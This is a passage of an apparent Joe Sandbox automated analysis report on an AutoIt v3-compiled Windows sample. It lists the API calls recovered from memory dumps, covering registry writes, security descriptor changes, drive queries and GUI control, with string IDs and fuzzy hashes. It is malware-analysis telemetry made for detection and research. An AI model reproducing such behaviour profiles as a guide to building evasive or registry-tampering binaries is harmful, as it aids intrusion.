• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 010334EA
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 010334F4
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
• Opcode ID: 359da227b6180e7840b191ca73c798b67727d5096485a0e0222f02089d02b54d
• Instruction ID: 84704e230f75094f74c5c1b9c83c5997a988702837b6253abf33b00729b41c41
• Opcode Fuzzy Hash: 359da227b6180e7840b191ca73c798b67727d5096485a0e0222f02089d02b54d
• Instruction Fuzzy Hash: E2B140B5A00205AFEB24DFA9CD85FAE7BB9FB48710F008114FA55EB290D775E940CB94
APIs
• SetErrorMode.KERNEL32(00000001), ref: 01025532
• GetDriveTypeW.KERNEL32(?,0104DC30,?,\\.\,0104DCD0), ref: 0102560F
• SetErrorMode.KERNEL32(00000000,0104DC30,?,\\.\,0104DCD0), ref: 0102577B
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: de1f21e7562bd9c6696a98562ca5fd5c2d9046d361ed5189c17bdfb11beb4271
• Instruction ID: ceb15bb08fc8589e0fc9099557919d5a1207290d9e616932da25cab2ceabc820
• Opcode Fuzzy Hash: de1f21e7562bd9c6696a98562ca5fd5c2d9046d361ed5189c17bdfb11beb4271
• Instruction Fuzzy Hash: D1611E31A80219EBC724EF29DE998FCB7B0FF18290B148099E4C6AF211D735ED01DB49
APIs
• GetCursorPos.USER32(?), ref: 01041BC4
• GetDesktopWindow.USER32 ref: 01041BD9
• GetWindowRect.USER32(00000000), ref: 01041BE0
• GetWindowLongW.USER32(?,000000F0), ref: 01041C35
• DestroyWindow.USER32(?), ref: 01041C55
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01041C89
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01041CA7
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 01041CB9
• SendMessageW.USER32(00000000,00000421,?,?), ref: 01041CCE
• SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 01041CE1
• IsWindowVisible.USER32(00000000), ref: 01041D3D
• SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 01041D58
• SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 01041D6C
• GetWindowRect.USER32(00000000,?), ref: 01041D84
• MonitorFromPoint.USER32(?,?,00000002), ref: 01041DAA
• GetMonitorInfoW.USER32(00000000,?), ref: 01041DC4
• CopyRect.USER32(?,?), ref: 01041DDB
• SendMessageW.USER32(00000000,00000412,00000000), ref: 01041E46
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: eb0757704dedaac18fb20a06461e6d375497717f83add4b3dbec4d525dbc1c70
• Instruction ID: 776801047756232beb68c2b036ad1c71f115e5b8258904f0c0b778298f172c94
• Opcode Fuzzy Hash: eb0757704dedaac18fb20a06461e6d375497717f83add4b3dbec4d525dbc1c70
• Instruction Fuzzy Hash: 13B19BB1604301AFD750DF69C985B9ABBE5FF88310F00896CF5D99B291C735E844CBA2
APIs
• CharUpperBuffW.USER32(?,?), ref: 01040D81
• _wcslen.LIBCMT ref: 01040DBB
• _wcslen.LIBCMT ref: 01040E25
• _wcslen.LIBCMT ref: 01040E8D
• _wcslen.LIBCMT ref: 01040F11
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 01040F61
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01040FA0
  • Part of subcall function 00FCFD52: _wcslen.LIBCMT ref: 00FCFD5D
  • Part of subcall function 01012B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01012BA5
  • Part of subcall function 01012B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01012BD7
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                                        • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                                                        • Opcode ID: d42e2130712d80ba334e2788bee146511017463d20ca3b10c99a77d1bffc15b3
                                                                                                                                                                                                                                                                                                        • Instruction ID: cd5aec730e86fb5438813cabefa07faebf60821dfaba5bd8b3f5becca0eadea1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d42e2130712d80ba334e2788bee146511017463d20ca3b10c99a77d1bffc15b3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6E1F2B16083418FC714DF29C9908AEB7E2BF84314B04896DF9D6AB3A6D734ED45CB81
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FB25F8
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00FB2600
                                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FB262B
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00FB2633
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00FB2658
                                                                                                                                                                                                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FB2675
                                                                                                                                                                                                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FB2685
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FB26B8
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FB26CC
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00FB26EA
                                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00FB2706
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB2711
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB19CD: GetCursorPos.USER32(?), ref: 00FB19E1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB19CD: ScreenToClient.USER32(00000000,?), ref: 00FB19FE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB19CD: GetAsyncKeyState.USER32(00000001), ref: 00FB1A23
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB19CD: GetAsyncKeyState.USER32(00000002), ref: 00FB1A3D
                                                                                                                                                                                                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00FB199C), ref: 00FB2738
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                                        • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                                                        • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5dd1e6f73a42c46d486c4049a6f256e2f2de64414b29027d93820ed69559e28f
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6649b57337c86a757d52430e6fd2808225dcd6aa664c99bff5203fde66cc11e2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5dd1e6f73a42c46d486c4049a6f256e2f2de64414b29027d93820ed69559e28f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DB19A75A002099FDB24DFA8CD85BEE3BB1FB48324F104219FA85A7294DB78E940DF51
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01011A60
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A6C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A7B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A82
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 01011A99
                                                                                                                                                                                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01011741
                                                                                                                                                                                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01011775
                                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 0101178C
                                                                                                                                                                                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 010117C6
                                                                                                                                                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 010117E2
                                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 010117F9
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 01011801
                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 01011808
                                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 01011829
                                                                                                                                                                                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 01011830
                                                                                                                                                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0101185F
                                                                                                                                                                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01011881
                                                                                                                                                                                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 01011893
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010118BA
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 010118C1
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010118CA
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 010118D1
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010118DA
• HeapFree.KERNEL32(00000000), ref: 010118E1
• GetProcessHeap.KERNEL32(00000000,?), ref: 010118ED
• HeapFree.KERNEL32(00000000), ref: 010118F4
  • Part of subcall function 01011ADF: GetProcessHeap.KERNEL32(00000008,010114FD,?,00000000,?,010114FD,?), ref: 01011AED
  • Part of subcall function 01011ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,010114FD,?), ref: 01011AF4
  • Part of subcall function 01011ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,010114FD,?), ref: 01011B03
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
• Opcode ID: 1fbf10e1f8faa21d0ad5253c6554ea274f3cb1add7b1876c3119d8707843c2ad
• Instruction ID: 3ac7ee39cc1f62569be66eb91b923eaad4fca12bbef1b22f35e54ed192855c87
• Opcode Fuzzy Hash: 1fbf10e1f8faa21d0ad5253c6554ea274f3cb1add7b1876c3119d8707843c2ad
• Instruction Fuzzy Hash: CF7170B5D00209ABEB10DFF4ED84FEEBBB8BF44240F148155FA94A7194D7399905CB60
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103CF1D
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0104DCD0,00000000,?,00000000,?,?), ref: 0103CFA4
• RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0103D004
• _wcslen.LIBCMT ref: 0103D054
• _wcslen.LIBCMT ref: 0103D0CF
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0103D112
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0103D221
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0103D2AD
• RegCloseKey.ADVAPI32(?), ref: 0103D2E1
• RegCloseKey.ADVAPI32(00000000), ref: 0103D2EE
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0103D3C0
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: Value$Close$_wcslen$ConnectCreateRegistry
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 9721498-966354055
• Opcode ID: caa45d792062326a2240c68911962032953e751d185b744ddf3fcf3ad727ab2b
• Instruction ID: e1b8f7228845da04e5db515ef917befc318fd3ca3ee198361c041b9b5ef16e59
• Opcode Fuzzy Hash: caa45d792062326a2240c68911962032953e751d185b744ddf3fcf3ad727ab2b
• Instruction Fuzzy Hash: 34125A356042019FD714DF59C881A6ABBEAEF88754F04849DF98A9B3A2CB35FD41CF81
APIs
• CharUpperBuffW.USER32(?,?), ref: 01041462
• _wcslen.LIBCMT ref: 0104149D
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 010414F0
• _wcslen.LIBCMT ref: 01041526
• _wcslen.LIBCMT ref: 010415A2
• _wcslen.LIBCMT ref: 0104161D
  • Part of subcall function 00FCFD52: _wcslen.LIBCMT ref: 00FCFD5D
  • Part of subcall function 01013535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 01013547
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 1103490817-4258414348
• Opcode ID: 4c30e9fbc51f3621835decd5ab68ca4b64de71fcbca8810095fa71af3dc824ad
• Instruction ID: 7393d6b862f990ea600869b8ee821b3dd1fd6e81b244ef1acb0d84f21fbaeb82
• Opcode Fuzzy Hash: 4c30e9fbc51f3621835decd5ab68ca4b64de71fcbca8810095fa71af3dc824ad
• Instruction Fuzzy Hash: B8E1A1B16043018FC714DF29C5908AAB7E2BF98314B0489ADF8D69B762DB34FD85CB81
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                                        • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01048DB5
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01048DC9
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01048DEC
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01048E0F
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 01048E4D
                                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,01046691), ref: 01048EA9
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 01048EE2
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 01048F25
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 01048F5C
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 01048F68
                                                                                                                                                                                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 01048F78
                                                                                                                                                                                                                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,01046691), ref: 01048F87
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 01048FA4
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 01048FB0
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                                        • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0102493D
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01024948
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0102499F
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 010249DD
                                                                                                                                                                                                                                                                                                        • GetDriveTypeW.KERNEL32(?), ref: 01024A1B
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01024A63
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01024A9E
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01024ACC
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                                        • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 01016395
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 010163A7
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 010163BE
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 010163D3
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 010163D9
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 010163E9
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 010163EF
                                                                                                                                                                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 01016410
                                                                                                                                                                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0101642A
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 01016433
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101649A
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 010164D6
                                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 010164DC
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 010164E3
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0101653A
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 01016547
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 0101656C
                                                                                                                                                                                                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 01016596
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 895679908-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e2fbb2b819118953e14ab845ca66273864e3e16765888523e8b63f1bebec097b
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6a3d779270db3945026a8b52c3216235409473985d089549292e4057427700ed
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e2fbb2b819118953e14ab845ca66273864e3e16765888523e8b63f1bebec097b
